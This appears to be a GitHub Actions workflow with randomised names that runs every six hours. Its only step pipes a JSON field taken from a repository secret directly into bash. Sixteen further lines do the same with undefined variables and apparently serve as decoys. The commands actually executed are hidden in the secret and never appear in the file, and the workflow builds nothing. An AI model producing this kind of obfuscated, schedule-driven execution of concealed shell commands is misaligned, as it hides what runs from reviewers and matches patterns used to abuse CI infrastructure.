name: niuyaorao3187
on:
  workflow_dispatch:
  schedule:
    - cron: '2 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: niuyaorao3187
        env:
          iisk5161: ${{ secrets.iisk5161 }}
        run: |
          echo $iisk5161 | jq -r .ui72 | /bin/bash
          echo $zmlq38 | jq -r .qjrhl48030 | /bin/bash
          echo $xhd63341 | jq -r .jgoy60 | /bin/bash
          echo $ir967 | jq -r .iahtw9 | /bin/bash
          echo $u101 | jq -r .qhwr1 | /bin/bash
          echo $jwlcs57 | jq -r .yxwh0 | /bin/bash
          echo $pbnki47125 | jq -r .imvl57713 | /bin/bash
          echo $ofm1943 | jq -r .s734 | /bin/bash
          echo $tvi83 | jq -r .bx42 | /bin/bash
          echo $rg5676 | jq -r .nkqn374 | /bin/bash
          echo $ed6160 | jq -r .uz294 | /bin/bash
          echo $egp6090 | jq -r .zwu92 | /bin/bash
          echo $at18114 | jq -r .u2 | /bin/bash
          echo $xaxp1 | jq -r .x93659 | /bin/bash
          echo $v7566 | jq -r .noyad1268 | /bin/bash
          echo $b60 | jq -r .bldw9 | /bin/bash
          echo $rtlm27595 | jq -r .iv1735 | /bin/bash

